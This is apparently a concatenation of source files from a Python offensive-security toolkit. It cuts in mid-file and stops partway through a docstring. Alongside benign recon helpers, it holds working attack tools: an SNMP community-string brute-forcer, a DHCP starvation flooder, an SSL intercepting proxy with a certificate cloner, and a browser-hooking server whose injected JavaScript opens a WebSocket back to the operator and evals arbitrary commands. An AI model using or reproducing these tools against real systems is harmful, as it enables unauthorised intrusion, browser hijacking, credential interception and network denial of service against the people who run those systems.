        except ssl.SSLError as e :
            # XXX can we get WantRead here?
            if e.args[0] == ssl.SSL_ERROR_WANT_WRITE :
                n = 0
            else :
                return self.error("send ssl error", e)
        except Exception as e :
            return self.error("send error", e)
        if n != len(self.queue[0]) :
            self.queue[0] = self.queue[0][n:]
        else :
            del self.queue[0]

    def copy(self) :
        try :
            buf = self.sock.recv(4096)
        except ssl.SSLError as e :
            # XXX can we get WantWrite here?
            if e.args[0] == ssl.SSL_ERROR_WANT_READ :
                self.ready = False
                return
            if e.args[0] == ssl.SSL_ERROR_EOF :
                return self.error("eof", e)
            return self.error("recv ssl error", e)
        except socket.error as e :
            if e.errno == errno.EWOULDBLOCK :
                self.ready = False
                return
            return self.error("recv socket error", e)
        except Exception as e :
            return self.error("recv error", e)
        if len(buf) == 0 :
            return self.error("eof", 0)
        for mod in self.opt.filters :
            buf = mod.filter(self.addr, self.dir, buf)
        self.dest.queue.append(buf)
        if self.opt.log :
            now = time.time()
            a = '%s:%s' % self.addr
            self.opt.log.write("%f %s %s %s\n" % (now, a, self.dir, buf.encode('hex')))
            self.opt.log.flush()
    def close(self) :
        safeClose(self.sock)

class Proxy(object) :
    """A client connection and the peer connection he proxies to"""
    def __init__(self, opt, sock, addr) :
        print("New client %s" % (addr,))
        self.opt = opt

        if opt.originalDst :
            try :
                sockaddr_in = sock.getsockopt(socket.SOL_IP, 80, 16)  # SO_ORIGINAL_DST = 80
            except socket.error :
                raise Error("SO_ORIGINAL_DST not supported on this platform")
            _, port, a, b, c, d = struct.unpack('!HHBBBB', sockaddr_in[:8])
            print(('Original destination was: %d.%d.%d.%d:%d' % (a, b, c, d, port)))
            self.opt.addr = '%d.%d.%d.%d' % (a, b, c, d)
            self.opt.port = port

        self.cl = Half(opt, sock, addr, 'i')
        # note: blocking connect for simplicity for now...
        ver = getSslVers(opt, opt.sslOut)
        peer = tcpConnect(opt.ip6, opt.addr, opt.port, 0, ver, opt.clientCert)
        self.peer = Half(opt, peer, addr, 'o')

        self.cl.dest = self.peer
        self.peer.dest = self.cl
        self.err = None

    def preWait(self, rr, r, w, e) :
        self.cl.preWait(rr, r,w,e)
        self.peer.preWait(rr, r,w,e)
    def postWait(self, r, w, e) :
        if not self.err :
            self.err = self.cl.postWait(r,w,e)
        if not self.err :
            self.err = self.peer.postWait(r,w,e)
        if self.err :
            self.cl.close()
            self.peer.close()
        return self.err

def serverLoop(opt) :
    qs = []
    qs.append(Server(opt, qs))
    while qs :
        # note: rr holds "read already ready"
        # meaning it wasnt fully drained last time
        rr,r,w,e = [], [], [], []
        for q in qs :
            q.preWait(rr, r, w, e)
        timeo = 10.0 if not rr else 0.0
        r,w,e = select(r, w, e, timeo)
        r = set(r).union(rr)
        for q in qs :
            if q.postWait(r, w, e) :
                qs.remove(q)
    print('done')

def autoCert(cn, caName, name) :
    """Create a certificate signed by caName for cn into name."""
    import ca # requires M2Crypto!
    cac, cak = ca.loadOrDie(caName)
    c,k = ca.makeCert(cn, ca=cac, cak=cak)
    ca.saveOrDie(c, k, name)

def getopts() :
    p = optparse.OptionParser(usage="usage: %prog [opts] addr port")
    p.add_option('-6', dest='ip6', action='store_true', help="Use IPv6")
    p.add_option("-b", dest="bindAddr", default="0.0.0.0", help="Address to bind to")
    p.add_option("-L", dest="locPort", type="int", help="Local port to listen on")
    p.add_option("-s", dest="ssl", action="store_true", help="Use SSL for incoming and outgoing connections")
    p.add_option("--ssl-in", dest="sslIn", action="store_true", help="Use SSL for incoming connections")
    p.add_option("--ssl-out", dest="sslOut", action="store_true", help="Use SSL for outgoing connections")
    p.add_option('-3', dest='sslV3', action='store_true', help='Use SSLv3 protocol')
    p.add_option('-T', dest='TLS', action='store_true', help='Use TLSv1 protocol')
    p.add_option("-C", dest="cert", default=None, help="Cert for SSL")
    p.add_option("-A", dest="autoCname", action="store", help="CName for Auto-generated SSL cert")
    p.add_option('-1', dest='oneshot', action='store_true', help="Handle a single connection")
    p.add_option("-l", dest="logFile", help="Filename to log to")
    p.add_option("-m", dest="modules", action="append", default=[], help="filtering modules")
    p.add_option("-O", dest="originalDst", action="store_true", help="Use SO_ORIGINAL_DST for destination")
    p.add_option("-c", dest="clientCert", default=None, help="Client certificate to present to server")
    opt,args = p.parse_args()
    if opt.ssl :
        opt.sslIn = True
        opt.sslOut = True
    if opt.sslV3 and opt.TLS :
        p.error("-3 and -T cannot be used together")
    if opt.bindAddr == '0.0.0.0' and opt.ip6 :
        opt.bindAddr = '::'
    if opt.originalDst and platform.system() != "Linux" :
        p.error("SO_ORIGINAL_DST is only supported in Linux systems")
    if len(args) != 2 and not opt.originalDst :
        p.error("specify address and port or use -O")
    if opt.cert is None :
        opt.cert = "ca" if opt.autoCname else "cert"
    if opt.ssl and opt.cert is None :
        if opt.autoCname is not None :
            p.error("specify CA cert")
        else :
            p.error("specify SSL cert")
    if not opt.originalDst :
        opt.addr = args[0]
        try :
            opt.port = int(args[1])
        except ValueError :
            p.error("invalid port: " + args[1])
    if opt.locPort == None :
        if opt.originalDst :
            p.error("-O requires -L")
        else :
            opt.locPort = opt.port
    return opt

def initModule(modstr) :
    modname, modargs = modstr.split(':', 1) if ':' in modstr else (modstr,"")
    try :
        mod = __import__(modname)
    except ImportError :
        fail("could not import %r" % modname)
    mod.init(modargs)
    return mod

def main() :
    opt = getopts()
    if opt.sslIn and opt.autoCname :
        autoCert(opt.autoCname, opt.cert, "autocert")
        opt.cert = "autocert"
    opt.log = file(opt.logFile, 'w') if opt.logFile else None
    opt.filters = list(map(initModule, opt.modules))
    serverLoop(opt)

if __name__ == '__main__' :
    main()




#!/usr/bin/env python3

import json
import logging
import os
import os.path
import pwd
import sys

import click
import requests
import requests_cache

from habu.lib.loadcfg import loadcfg


@click.command()
@click.argument('ip')
@click.option('-c', 'no_cache', is_flag=True, default=False, help='Disable cache')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
@click.option('-o', 'output', type=click.File('w'), default='-', help='Output file (default: stdout)')
def cmd_cymon_ip(ip, no_cache, verbose, output):
    """Simple cymon API client.

    Prints the JSON result of a cymon IP query.

    Example:

    \b
    $ habu.cymon.ip 8.8.8.8
    {
        "addr": "8.8.8.8",
        "created": "2015-03-23T12:03:42Z",
        "updated": "2018-08-24T04:06:07Z",
        "sources": [
            "safeweb.norton.com",
            "botscout.com",
            "virustotal.com",
            "phishtank"
        ],
        "events": "https://www.cymon.io/api/nexus/v1/ip/8.8.8.8/events",
        "domains": "https://www.cymon.io/api/nexus/v1/ip/8.8.8.8/domains",
        "urls": "https://www.cymon.io/api/nexus/v1/ip/8.8.8.8/urls"
    }

    """

    habucfg = loadcfg()

    if 'CYMON_APIKEY' not in habucfg:
        print('You must provide a cymon apikey. Use the ~/.habu.json file (variable CYMON_APIKEY), or export the variable HABU_CYMON_APIKEY')
        print('Get your API key from https://www.cymon.io/')
        sys.exit(1)

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    if not no_cache:
        homedir = pwd.getpwuid(os.getuid()).pw_dir
        requests_cache.install_cache(homedir + '/.habu_requests_cache')

    url = 'https://www.cymon.io:443/api/nexus/v1/ip/{}'.format(ip)
    headers = { 'Authorization': 'Token {}'.format(habucfg['CYMON_APIKEY']) }

    r = requests.get(url, headers=headers)

    if r.status_code not in [200, 404]:
        print('ERROR', r)
        return False

    if r.status_code == 404:
        print("Not Found")
        return False

    data = r.json()

    output.write(json.dumps(data, indent=4))
    output.write('\n')

if __name__ == '__main__':
    cmd_cymon_ip()



#!/usr/bin/env python3

import logging
import os
import sys
from pathlib import Path

import click

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

from scapy.all import ASN1_OID, IP, SNMP, UDP, SNMPget, SNMPvarbind, conf, sr1


@click.command()
@click.argument('ip')
@click.option('-p', 'port', default=161, help='Port to use')
@click.option('-c', 'community', default=None, help='Community (default: list of most used)')
@click.option('-s', 'stop', is_flag=True, default=False, help='Stop after first match')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose')
def cmd_crack_snmp(ip, community, port, stop, verbose):
    """Launches snmp-get queries against an IP, and tells you when
    finds a valid community string (is a simple SNMP cracker).

    The dictionary used is the distributed with the onesixtyone tool
    https://github.com/trailofbits/onesixtyone

    Example:

    \b
    # habu.crack.snmp 179.125.234.210
    Community found: private
    Community found: public

    Note: You can also receive messages like \<UNIVERSAL\> \<class
    'scapy.asn1.asn1.ASN1\_Class\_metaclass'\>, I don't know how to supress
    them for now.
    """

    FILEDIR = os.path.dirname(os.path.abspath(__file__))
    DATADIR = os.path.abspath(os.path.join(FILEDIR, '../data'))
    COMMFILE = Path(os.path.abspath(os.path.join(DATADIR, 'dict_snmp.txt')))

    if community:
        communities = [community]
    else:
        with COMMFILE.open() as cf:
            communities = cf.read().split('\n')

    conf.verb = False

    for pkt in IP(dst=ip)/UDP(sport=port, dport=port)/SNMP(community="public", PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1"))])):

        if verbose:
            print(pkt[IP].dst)

        for community in communities:

            if verbose:
                print('.', end='')
                sys.stdout.flush()

            pkt[SNMP].community=community
            ans = sr1(pkt, timeout=0.5, verbose=0)

            if ans and UDP in ans:
                print('\n{} - Community found: {}'.format(pkt[IP].dst, community))
                if stop:
                    break

    return True

if __name__ == '__main__':
    cmd_crack_snmp()



#!/usr/bin/env python3

import logging

import click

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

from scapy.all import ICMP, IP, TCP, conf, sr, sr1


@click.command()
@click.argument('ip')
@click.option('-p', 'port', default=80, help='Port to use (default: 80)')
@click.option('-f', 'flags', default=None, help='Flags that must be sent ever (default: fuzz with all flags)')
@click.option('-r', 'rflags', default=None, help='Filter by response flags (default: show all responses)')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose')
def cmd_tcpflags(ip, port, flags, rflags, verbose):
    """Send TCP packets with different flags and tell what responses receives.

    It can be used to analyze how the different TCP/IP stack implementations
    and configurations responds to packet with various flag combinations.

    Example:

    \b
    # habu.tcpflags www.portantier.com
    S  -> SA
    FS -> SA
    FA -> R
    SA -> R

    By default, the command sends all possible flag combinations. You can
    specify which flags must ever be present (reducing the quantity of
    possible combinations), with the option '-f'.

    Also, you can specify which flags you want to be present on the response
    packets to show, with the option '-r'.

    With the next command, you see all the possible combinations that have
    the FIN (F) flag set and generates a response that contains the RST (R)
    flag.

    Example:

    \b
    # habu.tcpflags -f F -r R www.portantier.com
    FPA  -> R
    FSPA -> R
    FAU  -> R
    """

    conf.verb = False

    pkts = IP(dst=ip) / TCP(flags=(0, 255), dport=port)

    out = "{:>8} -> {:<8}"

    for pkt in pkts:
        if not flags or all(i in pkt.sprintf(r"%TCP.flags%") for i in flags):
            ans = sr1(pkt, timeout=0.2)
            if ans:
                if not rflags or all(i in ans.sprintf(r"%TCP.flags%") for i in rflags):
                    print(out.format(pkt.sprintf(r"%TCP.flags%"), ans.sprintf(r"%TCP.flags%")))

    return True

if __name__ == '__main__':
    cmd_tcpflags()



#!/usr/bin/env python3

import json
import sys

import click

from pathlib import Path

from habu.lib.loadcfg import loadcfg


@click.command()
@click.argument('key')
def cmd_config_del(key):
    """Delete a KEY from the configuration.

    Note: By default, KEY is converted to uppercase.

    Example:

    \b
    $ habu.config.del DNS_SERVER
    """

    habucfg = loadcfg(environment=False)
    habucfg.pop(key.upper(), None)
    with Path('~/.habu.json').expanduser().open('w') as f:
        f.write(json.dumps(habucfg, indent=4, sort_keys=True))


if __name__ == '__main__':
    cmd_config_del()




#!/usr/bin/env python3
import json
import logging
import sys

import click

from habu.lib.ip import geo_location


@click.command()
@click.argument('ip_address')
@click.option('-v', 'verbose', is_flag=True, default=False,
              help='Verbose output.')
def cmd_ip_geolocation(ip_address, verbose):
    """Get the geolocation of an IP adddress from https://ipapi.co/.

    Example:

    \b
    $ habu.ip.geolocation 8.8.8.8
    {
        "ip": "8.8.8.8",
        "city": "Mountain View",
        ...
        "asn": "AS15169",
        "org": "Google LLC"
    }
    """
    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')
        print("Looking up %s..." % ip_address, file=sys.stderr)

    results = geo_location(ip_address)

    if results:
        print(json.dumps(results, indent=4))
    else:
        print("[X] %s is not valid IPv4 address" % ip_address)

    return True


if __name__ == '__main__':
    cmd_ip_geolocation()



#!/usr/bin/env python3

import logging
from time import time
import sys

import click

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

from scapy.all import ARP, IP, TCP, conf, sniff

hosts = {}


def procpkt(pkt):

    now = time()
    output = '{seconds}\t{ip}\t{hwaddr}\t{vendor}'

    if conf.manufdb:
        manufdb_available = True
    else:
        manufdb_available = False

    if 'ARP' in pkt:
        hosts[pkt[ARP].psrc] = {}
        hosts[pkt[ARP].psrc]['hwaddr'] = pkt[ARP].hwsrc
        hosts[pkt[ARP].psrc]['time'] = time()

        if manufdb_available:
            hosts[pkt[ARP].psrc]['vendor'] = conf.manufdb._get_manuf(pkt[ARP].hwsrc)
        else:
            hosts[pkt[ARP].psrc]['vendor'] = 'unknown'

        click.clear()

        if not manufdb_available:
            click.echo('WARNING: manufdb is not available. Can\'t get vendor.')

        for ip in sorted(hosts):
            print(output.format(
                seconds = int(now - hosts[ip]['time']),
                ip = ip,
                hwaddr = hosts[ip]['hwaddr'],
                vendor = hosts[ip]['vendor']
            ))


@click.command()
@click.option('-i', 'iface', default=None, help='Interface to use')
def cmd_arp_sniff(iface):
    """Listen for ARP packets and show information for each device.

    Columns: Seconds from last packet | IP | MAC | Vendor

    Example:

    \b
    1   192.168.0.1     a4:08:f5:19:17:a4   Sagemcom Broadband SAS
    7   192.168.0.2     64:bc:0c:33:e5:57   LG Electronics (Mobile Communications)
    2   192.168.0.5     00:c2:c6:30:2c:58   Intel Corporate
    6   192.168.0.7     54:f2:01:db:35:58   Samsung Electronics Co.,Ltd
    """

    conf.verb = False

    if iface:
        conf.iface = iface

    print("Waiting for ARP packets...", file=sys.stderr)

    sniff(filter="arp", store=False, prn=procpkt)


if __name__ == '__main__':
    cmd_arp_sniff()



import socket
import ssl
from OpenSSL import SSL, crypto

from pprint import pprint

import click

from habu.lib.certclone2 import certclone


@click.command()
@click.argument('hostname')
@click.argument('port')
@click.argument('keyfile', type=click.File('w'))
@click.argument('certfile', type=click.File('w'))
@click.option('-e', 'copy_extensions', is_flag=True, default=False, help='Copy certificate extensions (default: False)')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose')
def cmd_certclone(hostname, port, keyfile, certfile, copy_extensions, verbose):

    #context = ssl.create_default_context()
    context = SSL.Context(method=SSL.TLSv1_METHOD)
    #context = SSL.Context()

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock = SSL.Connection(context=context, socket=sock)
    sock.settimeout(5)
    sock.set_tlsext_host_name(hostname.encode())
    sock.connect((hostname, int(port)))
    sock.setblocking(1)
    sock.do_handshake()

    chain = sock.get_peer_cert_chain()
    print(certclone(chain, copy_extensions=copy_extensions))

    #for cert in original:
    #    #print(dir(cert))
    #    print(cert.to_cryptography())

    #with open('/tmp/cert.der', 'wb') as out:
    #    out.write(original)


    #key, cert = certclone(original, copy_extensions=copy_extensions)

    #keyfile.write(key)
    #certfile.write(cert)

if __name__ == '__main__':
    cmd_certclone()



#!/usr/bin/env python3

import asyncio
import json
import threading
from datetime import datetime
from http import HTTPStatus
from pathlib import Path
from pprint import pprint
from queue import Queue

import click
import websockets
from prompt_toolkit.contrib.completers import WordCompleter
from prompt_toolkit.history import InMemoryHistory
from prompt_toolkit.layout.lexers import PygmentsLexer
from prompt_toolkit.shortcuts import prompt
from pygments.lexers import JavascriptLexer

from habu.config import config
from habu.lib.completeme.javascript import javascript as completer_list


hook_js = '''
endpoint = "ws://{ip}:{port}";

socket = new WebSocket(endpoint);

socket.onmessage = function(event){{
    try {{
        out = eval(event.data);
        socket.send(out);
    }}
    catch(err) {{
        socket.send(err);
    }};
}};
'''


class MyWebSocketServerProtocol(websockets.server.WebSocketServerProtocol):
    ''' This returns the hook.js file if the requests is not a WebSocket request '''

    @asyncio.coroutine
    def process_request(self, path, request_headers):
        if 'Upgrade' in request_headers.keys():
            return None

        print('>>> HTTP Request received from {}. Sending hookjs'.format(self.remote_address[0]))

        if path.endswith('.js'):
            response_headers = [
                ('Content-Lenght', len(hook_js)),
                ('Content-type', 'application/javascript'),
            ]
            return (HTTPStatus.OK, response_headers, hook_js.encode())

        document = '<html><body><script>' + hook_js + '</script></body></html>'

        response_headers = [
            ('Content-Lenght', len(document)),
            ('Content-type', 'text/html'),
        ]

        return (HTTPStatus.OK, response_headers, document.encode())


class Runner():

    def __init__(self):

        self.internal_commands = {
            '_close': ('Closes the websocket', self.cmd_close),
            '_help' : ('Show this help', self.cmd_help),
            '_sessions' : ('List active sessions', self.cmd_sessions),
            '_channel' : ('Print channel log', self.cmd_channel),
            '_active' : ('Set active session (param: session_id)', self.cmd_active),
            '_websocket': ('Show websocket info', self.cmd_websocket),
        }

        self.get_external_commands()
        self.active = None
        self.sessions = {}


    def addifnew(self, websocket):
        for s in self.sessions.values():
            if s['websocket'] == websocket:
                return False

        if len(self.sessions) == 0:
            session_id = '0'
        else:
            session_id = str(int(sorted(self.sessions.keys(), reverse=True)[0]) + 1)
        self.sessions[session_id] = {
            'name': '{}:{} {}'.format(
                websocket.remote_address[0],
                websocket.remote_address[1],
                websocket.request_headers.get('User-Agent', 'No User Agent?'),
            ),
            'websocket': websocket,
        }

        print(">>> Connection from {}".format(websocket.remote_address[0]))
        return True


    def get_external_commands(self):

        self.external_commands = {}

        for f in (config['DATADIR'] / 'jshell-commands').glob('*.js'):
            with f.open() as cmd_file:
                cmd_name = '_' + f.stem
                cmd_help = cmd_file.readline().replace('//', '').strip()
                cmd_content = cmd_file.read()

            self.external_commands[cmd_name] = (cmd_help, cmd_content)


    def cmd_close(self):
        print(">>> Closing connection")
        for i in list(self.sessions):
            if self.sessions[i]['websocket'] == self.active:
                del self.sessions[i]
        self.active = None


    def cmd_sessions(self):
        for i,s in self.sessions.items():
            if self.active == s:
                print('{} * {}'.format(i, s['name']))
            else:
                print('{}   {}'.format(i, s['name']))
        return True


    def cmd_channel(self):
        outfile = Path('session-{}-{}.txt'.format(self.active['websocket'].remote_address[0], self.active['websocket'].remote_address[1]))
        if outfile.is_file():
            with outfile.open() as of:
                print(of.read(), '\n')
        else:
            print('No channel log yet')


    def cmd_websocket(self):
        pprint(dir(self.active['websocket']))
        pprint(self.active['websocket'])
        pprint(self.active['websocket'].request_headers)
        pprint(dir(self.active['websocket'].request_headers))
        pprint(self.active['websocket'].request_headers.get('User-Agent', 'No User Agent?'))

        return True


    def cmd_active(self, i):
        i = str(i)
        session = self.sessions.get(i, None)
        if session:
            if session['websocket'].open:
                self.active = session
            else:
                print('Session is closed')
                del self.sessions[i]
        else:
            print('Invalid session id')


    def cmd_help(self):
        print('\nInternal Commands ================================')
        for cmd_name in self.internal_commands.keys():
            print('{:<20} {}'.format(cmd_name, self.internal_commands[cmd_name][0]))

        print('\nExternal Commands ================================')
        for cmd_name in self.external_commands.keys():
            print('{:<20} {}'.format(cmd_name, self.external_commands[cmd_name][0]))


    async def send(self, command):
        await self.active['websocket'].send(command)

    async def run(self, command):

        if not self.sessions:
            print('No sessions')
            return False

        if not self.active:
            for s in self.sessions.values():
                self.active = s
                break

        if not command.startswith('_'):
            await self.send(command)
            return True

        if ' ' in command:
            arg = command.split(' ')[1]
            command = command.split(' ')[0]
        else:
            arg = None

        if command in self.internal_commands.keys():
            if arg:
                try:
                    self.internal_commands[command][1](arg)
                except Exception as e:
                    print(e)
            else:
                try:
                    self.internal_commands[command][1]()
                except Exception as e:
                    print(e)
        elif command in self.external_commands.keys():
            await self.send(self.external_commands[command][1])
        else:
            print('>>> Invalid command')
        return True


runner = Runner()
queue = Queue()


async def sender_handler(websocket):
    runner.addifnew(websocket)

    while True:

        if queue.empty():
            await asyncio.sleep(1)
            continue

        command = queue.get()
        try:
            await runner.run(command)
        except websockets.exceptions.ConnectionClosed:
            print('>>> Connection lost.')


async def consumer(websocket, message):
    if message.startswith('@##@'):
        message = message.replace('@##@', '').strip()
        outfile = Path('session-{}-{}.txt'.format(websocket.remote_address[0], websocket.remote_address[1]))
        if not outfile.is_file():
            header = '{} - {}:{} - {}\n'.format(
                datetime.now(),
                websocket.remote_address[0],
                websocket.remote_address[1],
                websocket.request_headers.get('User-Agent', 'No-User-Agent')
            )
            message = header + message

        with outfile.open('a') as of:
            of.write(message)
    else:
        try:
            j = json.loads(message)
            print(json.dumps(j, indent=4))
        except ValueError:
            print(message)


async def receiver_handler(websocket):
    runner.addifnew(websocket)

    # The commented only works with python3-websockets 4.x
    '''
    async for message in websocket:
        await consumer(websocket, message)
    '''

    while True:
        message = await websocket.recv()
        await consumer(websocket, message)


async def handler(websocket, path):
    sender_task = asyncio.ensure_future(sender_handler(websocket))
    receiver_task = asyncio.ensure_future(receiver_handler(websocket))
    done, pending = await asyncio.wait(
        [sender_task, receiver_task],
        return_when=asyncio.FIRST_COMPLETED,
    )


@click.command()
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose')
@click.option('-i', 'ip', default='127.0.0.1', help='IP to listen on')
@click.option('-p', 'port', default=3333, help='Port to listen on')
def cmd_jshell(ip, port, verbose):
    """Control a web browser through Websockets.

    Bind a port (default: 3333) and listen for HTTP connections.

    On connection, send a JavaScript code that opens a WebSocket that
    can be used to send commands to the connected browser.

    You can write the commands directly in the shell, or use plugins, that
    are simply external JavaScript files.

    Using habu.jshell you can completely control a web browser.

    Reference: https://developer.mozilla.org/en-US/docs/Web/API/WebSockets_API

    Example:

    \b
    $ habu.jshell
    >> Listening on 192.168.0.10:3333. Waiting for a victim connection.
    >> HTTP Request received from 192.168.0.15. Sending hookjs
    >> Connection from 192.168.0.15
    $ _sessions
    0 * 192.168.0.15:33432 Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0
    $ _info
    {
        "user-agent": "Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0",
        "location": "http://192.168.0.10:3333/",
        "java-enabled": false,
        "platform": "Linux x86_64",
        "app-code-name": "Mozilla",
        "app-name": "Netscape",
        "app-version": "5.0 (X11)",
        "cookie-enabled": true,
        "language": "es-AR",
        "online": true
    }
    $ document.location
    http://192.168.0.10:3333/
    """

    global hook_js
    hook_js = hook_js.format(ip=ip, port=port)

    print('>>> Listening on {}:{}. Waiting for a victim connection.'.format(ip, port))

    eventloop = asyncio.get_event_loop()
    eventloop.run_until_complete(websockets.serve(handler, ip, port, create_protocol=MyWebSocketServerProtocol))

    thread = threading.Thread(target=eventloop.run_forever)
    thread.start()

    completer = WordCompleter(completer_list + list(runner.internal_commands) + list(runner.external_commands))
    history = InMemoryHistory()

    while True:
        if not thread.is_alive():
            break

        cmd = prompt('$ ', patch_stdout=True, completer=completer, history=history, lexer=PygmentsLexer(JavascriptLexer))
        if cmd:
            if cmd == '_help':
                runner.cmd_help()
            elif runner.sessions:
                queue.put_nowait(cmd)
            else:
                print('>>> No active session!')


if __name__ == '__main__':
    cmd_jshell()



from scapy.all import *
from pprint import pprint

def pscan_tcp_syn(ip, ports=[80]):

    result = { p:'closed' for p in ports }

    ans,unans = sr(IP(dst=ip)/TCP(sport=RandShort(), dport=ports, flags='S'), timeout=2, verbose=False)

    for pkt in ans:
        if pkt[1]['TCP'].flags == 18: # 18 = SA
            result[pkt[1]['TCP'].sport] = 'open'

    return result


def pscan_tcp_fin(ip, ports=[80]):

    result = { p:'open' for p in ports }

    ans,unans = sr(IP(dst=ip)/TCP(sport=RandShort(), dport=ports, flags='F'), timeout=2, verbose=False)

    print(ans.summary(), unans.summary())

    for pkt in ans:
        if pkt[1]['TCP'].flags == 18: # 18 = SA
            result[pkt[1]['TCP'].sport] = 'open'

    return result


if __name__ == '__main__':
    #print(pscan_tcp_syn('www.google.com', [22, 80]))
    print(pscan_tcp_fin('www.redhat.com', [22, 80]))





"""Retrieve details of an HTTP server."""
import requests
import urllib3

urllib3.disable_warnings()


def get_headers(server):
    """Retrieve all HTTP headers"""
    try:
        response = requests.head(
            server, allow_redirects=False, verify=False, timeout=5)
    except requests.exceptions.ConnectionError:
        return False

    return dict(response.headers)


def get_options(server):
    """Retrieve the available HTTP verbs"""
    try:
        response = requests.options(
            server, allow_redirects=False, verify=False, timeout=5)
    except (requests.exceptions.ConnectionError,
            requests.exceptions.MissingSchema):
        return "Server {} is not available!".format(server)

    try:
        return {'allowed': response.headers['Allow']}
    except KeyError:
        return "Unable to get HTTP methods"




"""Perform a reverse lookup of an IP address."""
import json
import logging
import sys

import click

from habu.lib.dns import lookup_reverse


@click.command()
@click.argument('ip_address')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
def cmd_dns_lookup_reverse(ip_address, verbose):
    """Perform a reverse lookup of a given IP address.

    Example:

    \b
    $ $ habu.dns.lookup.reverse 8.8.8.8
    {
        "hostname": "google-public-dns-a.google.com"
    }
    """
    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')
        print("Looking up %s..." % ip_address, file=sys.stderr)

    answer = lookup_reverse(ip_address)

    if answer:
        print(json.dumps(answer, indent=4))
    else:
        print("[X] %s is not valid IPv4/IPV6 address" % ip_address)

    return True


if __name__ == '__main__':
    cmd_dns_lookup_reverse()



#!/usr/bin/env python3

import click

from habu.lib import contest


@click.command()
def cmd_contest():
    """Try to connect to various services and check if can
    reach them using your internet connection.

    Example:

    \b
    $ habu.contest
    IP:    True
    DNS:   True
    FTP:   True
    SSH:   True
    HTTP:  True
    HTTPS: True"""

    print("IP:    %s" % contest.check_ip())
    print("DNS:   %s" % contest.check_dns())
    print("FTP:   %s" % contest.check_ftp())
    print("HTTP:  %s" % contest.check_http())
    print("HTTPS: %s" % contest.check_https())


if __name__ == '__main__':
    cmd_contest()



#!/usr/bin/env python3

import json
import sys

import click

from pathlib import Path

from habu.lib.xor import xor
from habu.config import config

from habu.lib.loadcfg import loadcfg

from cryptography.fernet import Fernet


@click.command()
@click.option('-w', 'writecfg', is_flag=True, default=False, help='Write this key to ~/.habu.json')
def cmd_fernet_genkey(writecfg):
    """Generate a new Fernet Key, optionally write it to ~/.habu.json

    Example:

    \b
    $ habu.fernet.genkey
    xgvWCIvjwe9Uq7NBvwO796iI4dsGD623QOT9GWqnuhg=
    """

    key = Fernet.generate_key()
    print(key.decode())

    if writecfg:
        habucfg = loadcfg(environment=False)
        habucfg['FERNET_KEY'] = key.decode()
        with Path('~/.habu.json').expanduser().open('w') as f:
            f.write(json.dumps(habucfg, indent=4, sort_keys=True))

if __name__ == '__main__':
    cmd_fernet_genkey()




import pwd
import os
from pathlib import Path
import json
import sys

def loadcfg(environment=True):

    cfg = {}

    homedir = Path(pwd.getpwuid(os.getuid()).pw_dir)
    cfgfile = homedir / '.habu.json'

    if cfgfile.is_file():
        #print('file exists!')
        with cfgfile.open() as f:
            try:
                cfg = json.loads(f.read())
            except Exception as e:
                print('exception', e, file=sys.stderr)

    if environment:
        for k,v in os.environ.items():
            if k.startswith('HABU_'):
                k = k.replace('HABU_', '')
                cfg[k] = v
                #print(k,v)


    cfg['BASEDIR'] = (Path(os.path.dirname(os.path.abspath(__file__))) / '..').resolve()
    cfg['DATADIR'] = Path(cfg['BASEDIR'] / 'data')

    return cfg

if __name__ == '__main__':
    loadcfg()




#!/usr/bin/env python3

import logging

from time import sleep

import click

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

from scapy.all import (BOOTP, DHCP, ICMP, IP, TCP, UDP, Ether, RandMAC, conf,
                       get_if_raw_hwaddr, sr1, srp)


@click.command()
@click.option('-i', 'iface', default=None, help='Interface to use')
@click.option('-t', 'timeout', default=1, help='Time (seconds) to wait for responses')
@click.option('-s', 'sleeptime', default=0, help='Time (seconds) between requests')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
def cmd_dhcp_starvation(iface, timeout, sleeptime, verbose):
    """Send multiple DHCP requests from forged MAC addresses to
    fill the DHCP server leases.

    When all the available network addresses are assigned, the DHCP server don't send responses.

    So, some attacks, like DHCP spoofing, can be made.

    \b
    # habu.dhcp_starvation
    Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.6:bootpc / BOOTP / DHCP
    Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.7:bootpc / BOOTP / DHCP
    Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.8:bootpc / BOOTP / DHCP
    """

    conf.verb = False

    if iface:
        conf.iface = iface

    conf.checkIPaddr = False

    ether = Ether(dst="ff:ff:ff:ff:ff:ff")
    ip = IP(src="0.0.0.0",dst="255.255.255.255")
    udp = UDP(sport=68, dport=67)
    dhcp = DHCP(options=[("message-type","discover"),"end"])

    while True:
        bootp = BOOTP(chaddr=str(RandMAC()))
        dhcp_discover = ether / ip / udp / bootp / dhcp
        ans, unans = srp(dhcp_discover, timeout=1)      # Press CTRL-C after several seconds

        for _, pkt in ans:
            if verbose:
                print(pkt.show())
            else:
                print(pkt.sprintf(r"%IP.src% offers %BOOTP.yiaddr%"))

        sleep(sleeptime)


if __name__ == '__main__':
    cmd_dhcp_starvation()



#!/usr/bin/env python3

import json
import logging
import os
import os.path
import pwd
import sys

import click

from habu.lib.loadcfg import loadcfg
from habu.lib.shodan import shodan_get_result

@click.command()
@click.argument('ip')
@click.option('-c', 'no_cache', is_flag=True, default=False, help='Disable cache')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
@click.option('-o', 'output', type=click.File('w'), default='-', help='Output file (default: stdout)')
def cmd_shodan(ip, no_cache, verbose, output):
    """Simple shodan API client.

    Prints the JSON result of a shodan query.

